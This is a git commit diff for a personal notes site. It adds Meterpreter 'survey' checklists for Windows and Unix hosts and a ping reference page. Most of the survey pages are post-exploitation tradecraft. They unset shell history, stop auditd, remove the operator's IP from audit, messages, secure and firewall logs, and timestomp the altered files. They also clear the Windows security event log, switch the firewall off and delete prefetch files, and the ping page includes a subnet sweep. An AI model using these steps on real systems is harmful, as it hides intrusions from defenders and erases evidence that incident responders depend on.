Commit aebe285
Changed files (6)
msf/meta/index.md
@@ -5,4 +5,4 @@ title: "Metasploit Meta"
---
-* [survey]({{< relref "msf/meta/survey.md" >}})
+* [windows survey]({{< relref "msf/survey/windows.md" >}})
msf/meta/survey.md
@@ -1,87 +0,0 @@
----
-date: "2017-02-15"
-draft: false
-title: "Meterpreter Survey - Windows"
-
----
-
-
-# Init
-0. **Situational Awareness**
-
- * `getuid` *`# Get the meterpreter current User Id`*
- * `getpid` *`# Get the meterpreter current PID`*
- * `ipconfig` *`# Host Name, IP Address`*
- * `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
- * `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
- * `netstat` *`# Get a list of the current connections and listening ports`*
- * `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
- * `pwd`
- * `ls`
-
-0. **System Date/Time**
-
- * `run wmic -c "timezone list brief"` *`# Get the current time zone`*
- * `run wmic -c "os get localdatetime"` *`# Get the current time`*
-
-0. **Security and Settings**
- * `run get_env` *`# Show system environment variables`*
- * `run getcountermeasure` *`# Determine if firewall is enabled`*
- * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
- * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
- * `run multicommand -cl "netsh firewall show logging"` *`# Determine if the built-in firewall has logging enabled or disabled`*
- * `run event_manager -i` *`# Show which Windows event logs are available`*
-
-# Users and Domains
-
-0. **Users**
-run wmic -c "netlogin get name,lastlogon,badpasswordcount"
- Password Settings
-
-# Software
-
-0. **Enumerate Persistance Vectors**
-
- * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
- * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
- * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
- * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
- * `reg queryval - k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
-
-0. **Windows firewall log cleaning**
-
- * `run multicommand -cl "findstr \"<IP ADDRESS>\" c:\\windows\\pfirewall.log"`
- * `run multicommand -cl "cmd /c findstr /v \"<IP ADDRESS>\" c:\\windows\\pfirewall.log > c:\\temp\\pfirewall.log"`
- * `timestomp pfirewall.log -z "MM/DD/YYYY HH:mm:ss"`
-
-0. Defender / Security Essentials
-
-reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting
-
-0. Dr. Watson
-
-# Networking
-
-reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable
-reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer
-
-0. Local Area Networks
-
-run netenum -ps -r 172.17.20.200-172.17.20.230 Pingsweeep of network range
- run multicommand -cl "ping -n 2 <Target 2 IP>"
-
-
-# Doucments and File System interactions
-search -r -d C:\\Users\\ -f *.doc Using Meterpreter's built-in functionality, determine whether any files with a .doc extension are present on the system. Limit your search to just the user's directories.
- Using Meterpreter's built-in functionality, search for any .log files related to Windows Defender.
-search -d "C:\\ProgamData\\Microsoft\\Windows Defender\\" -f *.log -r
- Download to your /tmp directory the logs from the Windows Defender\Scans\History\Service subdirectory.
-download -r "C:\\ProgamData\\Microsoft\\Windows Defender\\scans\\history\\service\\" "/tmp/"
- Using Meterpreter's built-in functionality, get a list of the registry values under the System run key.
-run multicommand -cl "cmd /c dir /o:d /t:w" Change to the prefetch directory and get a list of directory contents, sorted oldest to newest by write time.
- remove prefetch files that you created (post exploit)
-
-
-# Cleanup
-
-Prefetch Directory
msf/survey/unix.md
@@ -0,0 +1,111 @@
+---
+date: "2017-02-21"
+draft: false
+title: "Meterpreter Survey - Unix"
+
+---
+# Init
+
+0. **Situational Awareness**
+
+ * `unset HISTFILE`
+ * `su root` *`# if needed`*
+ * `unset HISTFILE`
+ * `date`
+ * `date +%s`
+ * `find /var/log -type f -mmin -10 2> /dev/null`
+ * `ls -lart /var/log`
+ * `cat /etc/*syslog*.conf | grep -v "^#"`
+ * `service auditd status`
+ * `/sbin/chkconfig --list`
+ * `service --status-all`
+ * `ps -aef`
+ * `uname -a`
+ * `cat /etc/*release`
+ * `cat /etc/inittab`
+ * `w`
+ * `who -a`
+ * `last -a -i`
+ * `lastlog`
+ * `lastb`
+ * `uptime`
+ * `cat ~/.bash_history`
+ * `/sbin/lsmod`
+ * `vmstat`
+ * `cat /proc/cpuinfo`
+ * `hostname`
+ * `/sbin/iptables -nL --line-numbers`
+ * `cat /etc/resolv.conf`
+ * `/sbin/ifconfig -a`
+ * `netstat -antup`
+ * `ps -aef`
+
+0. **Crontabs**
+
+ * `for user in $(cut -f1 -d: /etc/passwd); do echo $user >> /tmp/crontabs; crontab -u $user -l >> /tmp/crontabs; done`
+ * `cat /tmp/crontabs | more`
+ * `rm -f /tmp/crontabs`
+ * `ls -la /etc/cron*`
+ * `cat /etc/crontab`
+
+0. **Suspicious files**
+
+ * `find / -type f -name ".*"` *`# find hidden files`*
+ * `find / -type d -name ".*"` *`# find hidden directories`*
+ * `find / -user root –perm -4000 –print0 | xargs -0 ls -l` *`# find SUID root executables`*
+ * `find / -perm -2000 –print0 | xargs -0 ls -l` *`# search SGID programs`*
+
+# Cleaning Logs
+
+0. **Cleaning audit log**
+
+ * `grep -n "<IP ADDR>" /var/log/audit/audit.log`
+ * `service auditd stop`
+ * `wc -l /var/log/audit/audit.log`
+ * `head -n <X>/var/log/audit/audit.log > /tmp/aud.log` *`# <X> = line number before your entries start`*
+ * `wc -l /tmp/aud.log` *`# should be X lines`*
+ * `tail /tmp/aud.log`
+ * `date -d @epoch time of last entry`
+ * `cat /tmp/aud.log > /var/log/audit/audit.log`
+ * `chmod 0600 /var/log/audit/audit.log`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/audit/audit.log`
+ * `ls -al /var/log/audit/audit.log`
+ * `rm -f /tmp/aud.log`
+
+0. **Cleaning Messages log**
+
+ * `grep -n "<IP ADDR>" /var/log/messages`
+ * `wc -l /var/log/messages`
+ * `head -n X /var/log/messages > /tmp/msg.log` *`# where X is the line number before your entries start`*
+ * `wc -l /tmp/msg.log` *`# should be X lines`*
+ * `tail /tmp/msg.log`
+ * `cat /tmp/msg.log > /var/log/messages`
+ * `chmod 0600 /var/log/messages`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/messages`
+ * `ls -al /var/log/messages`
+ * `rm -f /tmp/msg.log`
+
+0. **Cleaning /var/log/secure**
+
+ * `grep "sshd\[<PID>\]" /var/log/secure`
+ * `grep -v "sshd\[<PID>\]" /var/log/secure > /tmp/secure.log`
+ * `tail /tmp/secure.log`
+ * `cat /tmp/secure.log > /var/log/secure`
+ * `tail -3 /var/log/secure`
+ * `touch -t YYYYMMDDHHmm.ss /var/log/secure`
+ * `rm -rf /tmp/secure.log`
+
+# Cleanup
+
+0. **Delete any tmp files you created**
+
+ * `ls -l /tmp`
+ * `rm -f /tmp/*.log`
+
+0. **Restart auditd after you logout**
+
+ * `echo -e '#!/bin/sh\nsleep 30\nfunction d {\nservice auditd start && rm -rf /tmp/X-unix\n}\ntrap d EXIT' > X-unix`
+ * `chmod 755 X-unix`
+ * `cat X-unix`
+ * `./X-unix&`
+
msf/survey/windows.md
@@ -0,0 +1,187 @@
+---
+date: "2017-02-21"
+draft: false
+title: "Meterpreter Survey - Windows"
+
+---
+
+
+# Init
+0. **Situational Awareness**
+
+ * `getuid` *`# Get the meterpreter current User Id`*
+ * `getpid` *`# Get the meterpreter current PID`*
+ * `ipconfig` *`# Host Name, IP Address`*
+ * `sysinfo` *`# Get the hostname, OS, and architecture of the system`*
+ * `ps` *`# Get a list of the currently running processes and check current meterpreter process PID`*
+ * `netstat` *`# Get a list of the current connections and listening ports`*
+ * `cd c:\\windows\\temp\\` *`# Change directory to have predictable File System interactions`*
+ * `idletime`
+ * `pwd`
+ * `ls`
+
+0. **System Date/Time**
+
+ * `run wmic -c "timezone list brief"` *`# Get the current time zone`*
+ * `run wmic -c "os get localdatetime"` *`# Get the current time`*
+
+0. **Security and Settings**
+ * `run get_env` *`# Show system environment variables`*
+ * `run getcountermeasure` *`# Determine if firewall is enabled`*
+ * `run multicommand -cl "at","schtasks /query"` *`# List scheduled tasks`*
+ * `run wmic -c "startup list"` *`# Get a list of the applications that are set to launch at startup`*
+ * `run multicommand -cl "netsh firewall show logging"` *`# Determine if the built-in firewall has logging enabled or disabled`*
+ * `run event_manager -i` *`# Show which Windows event logs are available`*
+ * `reg enumkey -k "HKLM\\Security\\Policy\\PolAdtEv"`
+ * `run uploadexec -e /<PATH_TP>/auditpol.exe -r -v`
+
+# Domains and Users
+
+0. **Domains**
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v productname`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion" -v currentversion`
+ * `reg queryval -k "HKLM\\system\\currentcontrolset\\services\\tcpip\\parameters" -v "Domain"`
+ * `run wmic -c "computersystem get domain"`
+
+0. **Users**
+ * `run enum_logged_on_users -c`
+ * `run wmic -c "netlogin get name,lastlogon,badpasswordcount"`
+
+
+# Software
+
+0. **Installed Software**
+
+ * `run get_application_list`
+
+0. **Enumerate Persistance Vectors**
+ * `run wmic -c "startup list"`
+ * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+ * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+ * `reg enumkey -k "HKLM\\software\\microsoft\\windows\\currentversion\\run"`
+ * `reg enumkey -k "HKCU\\software\\microsoft\\windows\\currentversion\\runonce"`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" -v "shell"` *`# xp`*
+ * `reg queryval -k "HKLM\\software\\microsoft\\windows\\currentversion\\winlogon" -v "shell"`
+
+
+0. **Defender / Security Essentials**
+
+ * `migrate <PID>` *`# Migrage to SYSTEM svchost, required for viewing/editing spynet registry`*
+ * `reg enumkey -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet"`
+ * `reg enumkey -k "HKLM\\SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions"`
+ * `reg queryval -k "HKLM\\Software\\Microsoft\\Windows Defender\\spynet" -v spynetreporting` *`# 0=no, 1=basic, 2=advanced`*
+ * `ls "C:/programdata/microsoft/microsoft antimalware/quarantine/entries"` *`# quarantined files`*
+ * `run event_manager -l SYSTEM -f 1001` *`# last scheduled job`*
+ * `cat "c:/windows/temp/MpSigStub.log"`
+ * `cat "c:/windows/temp/MpCmdRun.log"`
+
+0. **Remote Logging**
+
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (NP-In)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Remote Event Log Management (RPC-EPMAP)\""`
+ * `run multicommand -cl "netsh advfirewall firewall show rule name=\"Windows Remote Management (HTTP-In)\""`
+
+0. Dr. Watson
+
+# Networking
+
+0. **Local Area Networking**
+
+ * `run multicommand -cl "ipconfig /all"`
+ * `run multicommand -cl "ipconfig /displaydns"`
+ * `netstat`
+
+0. **Network awareness**
+
+ * `run netenum -ps -r <IPSTART>-<IPEND>` *`# Pingsweeep of network range`*
+ * `run multicommand -cl "ping -n 2 <IP>"`
+
+0. **Internet Settings**
+
+ * `reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyEnable`
+ * `reg queryval -k "HKCU\\software\\microsoft\\windows\\currentversion\\internet settings" -v ProxyServer`
+
+# Doucments and File System interactions
+
+0. **Finding Files**
+
+ * `search -f *.<EXT>` *`# find all files of type <EXT>`*
+ * `search -d "C:\\<PATH>\\<DIR>\\" -f *.<EXT> -r"` *`# search a specific <DIR>`*
+ * `run multicommand -cl "cmd /c dir c:\\*.<EXT> /S /A"`
+ * `download <FILE>` *`# download for offline analysis (e.g. strings)`*
+
+# Malware
+
+0. **Enumerate processes and handles**
+
+ * `ps`
+ * `netstat`
+ * `search -f <PROCESS>.exe`
+ * `run multicommand -cl "tasklist /FI \"PID eq <PID>\" /M"`
+ * `upload /<PATH> handle.exe`
+ * `run multicommand -cl "cmd /c handle -p "<PROCESS>.exe" -accepteula"`
+ * `rm C:\\<PATH>\\handle.exe`
+ * `ls`
+
+0. **Related files**
+
+ * `run multicommand -cl "cmd /c dir c:\\windows\\system32\\malicious.file"`
+ * `run multicommand -cl "cmd /c dir c:\\ /S /A | findstr \"MM/DD/YYYY HH:MM\""` *`# related files by date`*
+ * `run multicommand -cl "cmd /c dir c:\\windows\\system32\\drivers /o:d /t:w"` *`# recent drivers`*
+
+0. **Strings and Memory**
+
+ * `download <FILE>` *`# download for offline analysis (e.g. strings)`*
+ * `run process_memdump -p PID`
+
+# Cleanup
+
+0. **Event Log**
+
+ * `run event_manager -i`
+ * `run event_manager -l security -f 529` *`# ms08_067`*
+ * `run event_manager -l security -f 680` *`# ms08_067`*
+ * `run event_manager -l system -f 1116` *`# bccaa_bof`*
+ * `run event_manager -l system -f 1117` *`# bcaaa_bof`*
+ * `run event_manager -c security`
+ * `run event_manager -l security` *`# expect 517 for cleared log`*
+
+0. **Logs and Dump files**
+
+ * `run multicommand -cl "cmd /c dir c:\\*.*log /S /A"`
+ * `run multicommand -cl "cmd /c dir c:\\*.*dmp /S /A"`
+ * `search -f *.*dmp`
+ * `ls "c:\\documents and settings\\all users\\application data\\microsoft\\dr watson"`
+
+0. **WER**
+
+ * `ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportarchive"`
+ * `ls "c:\\ProgramData\\microsoft\\windows\\wer\\reportqueue"`
+ * `ls "c:\\ProgramData\\Microsoft\\Windows\\wer\\"`
+
+0. **Windows firewall log cleaning**
+
+ * `run multicommand -cl "netsh advfirewall show currentprofile"`
+ * `run multicommand -cl "netsh advfirewall show allprofiles"`
+ * `run multicommand -cl "netsh advfirewall export \"c:/windows/temp/firewall.wfw\""`
+ * `ls "c:/windows/system32/logfiles/firewall"`
+ * `run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log"`
+ * `cd c:/windows/temp`
+ * `run multicommand -cl "cmd /c findstr /V \"<IP ADDR>\" c:\\windows\\system32\\firewall\\pfirewall.log > c:\\windows\\temp\\fw.tmp"`
+ * `run multicommand -cl "findstr \"<IP ADDR>\" c:\\windows\\temp\\fw.tmp"`
+ * `cat fw.tmp`
+ * `ps`
+ * `run multicommand -cl "netsh advfirewall set currentprofile state off"`
+ * `run multicommand -cl "cmd /c move c:\\windows\\temp\\fw.tmp c:\\windows\\system32\\firewall\\pfirewall.log"`
+ * `timestomp c:\\windows\\system32\\firewall\\pfirewall.log -m "MM/DD/YYYY HH:MM:SS" `
+ * `ls c:\\windows\\system32\\firewall\\pfirewall.log`
+ * `run multicommand -cl "netsh advfirewall import \"c:/windows/temp/firewall.wfw\""`
+ * `run multicommand -cl "netsh advfirewall set currentprofile state on"`
+ * `ls c:\\windows\\system32\\firewall\\pfirewall.log`
+
+0. **Prefetch Cleaning**
+
+ * `cd c:\\windows\\prefetch`
+ * `run multicommand -cl "cmd /c dir /o:d /t:w"`
+ * `rm <FILE>.pf`
unix/commands/ping.md
@@ -0,0 +1,42 @@
+---
+date: "2017-03-07"
+draft: false
+title: "ping"
+tag: ["cli", "commands"]
+category: "unix"
+
+---
+## Summary - `ping`
+
+| OS | Default Available | Online Man |
+|---------|-------------------|------------|
+| Linux | Y | |
+| Solaris | Y | |
+| BSD | Y | |
+| MacOS | Y | |
+
+
+| Basics | Command |
+|------------|------------|
+| Version | `ping -V` |
+| Usage info | `ping -h` |
+| Man | `man ping` |
+
+
+## Usage - `ping`
+
+send ICMP ECHO_REQUEST to network hosts
+
+### Examples
+| ping | OS | description |
+|-------------------------|------|---------------------------------------|
+| `ping 192.168.1.1` | Unix | send ICMP ECHO_REQUEST to 192.168.1.1 |
+| `ping -c 1 192.168.1.1` | Unix | only send 1 ping |
+
+#### Ping sweep a subnet
+```
+for i in `seq 1 255`; do (ping -c 1 10.11.1.$i | tr \\n ' ' | awk '/1 received/ {print $2}' &); done
+```
+
+
+
unix/commands/pmap.md
@@ -1,6 +0,0 @@
----
-date: "2016-12-20"
-draft: false
-title: ""
-
----